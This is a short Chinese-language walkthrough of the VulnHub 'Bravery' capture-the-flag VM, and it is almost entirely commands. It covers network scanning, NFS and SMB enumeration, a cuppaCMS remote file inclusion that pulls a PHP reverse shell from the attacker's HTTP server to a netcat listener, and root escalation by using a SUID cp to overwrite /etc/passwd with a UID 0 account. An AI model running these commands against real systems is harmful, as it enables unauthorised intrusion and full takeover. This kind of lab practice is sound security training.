虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/
虚拟机简介:可能有不止一种方法来获得此计算机上的root特权
目标:1个flag
级别:初级
netdiscover -r 192.168.207.0/24
nmap -A -sS -sV -v -p- 192.168.207.163
通过扫描信息查看开放22、53、80、111、139、443、445、2049端口,并且检测到位WordPress4.8.3站点
showmount -e 192.168.207.163
mkdir /tmp/nsf
mount -t nfs 192.168.207.163:/var/nfsshare /tmp/nsf
enum4linux 192.168.207.163
查看有anonymous和secured目录
smbclient //192.168.207.163/anonymous
password: qwertyuioplkjhgfdsazxcvbnm
没有发现有用的信息
smbclient //192.168.207.163/secured -U David
password: qwertyuioplkjhgfdsazxcvbnm
get david.txt
get genevieve.txt
get README.txt
下载共享文件
2.8 登录WEB查看
http://192.168.207.163/developmentsecretpage
http://192.168.207.163/genevieve/
使用burp进行探测发现,有一个cuppaCMS
searchsploit cuppa
cat /usr/share/exploitdb/exploits/php/webapps/25971.txt
cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php
vim shell.php
python -m SimpleHTTPServer
nc -nlvp 4444
http://192.168.207.163/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.207.129:8000/shell.php?
python -c 'import pty;pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null
发现cp有suid的权限
密码为:hacker
perl -le 'print crypt("hacker","salt")'
使用perl生成加盐密码
创建账号为hacker
cp /etc/passwd ./
echo 'hacker:sagIxVoGwjNkY:0:0::/root:/bin/bash' >> passwd
在kali上开启http服务
python -m SimpleHTTPServer
在服务器上下载passwd文件
cd /tmp
wget http://192.168.207.129:8000/passwd
cp passwd /etc/passwd
su - hacker
ls /root/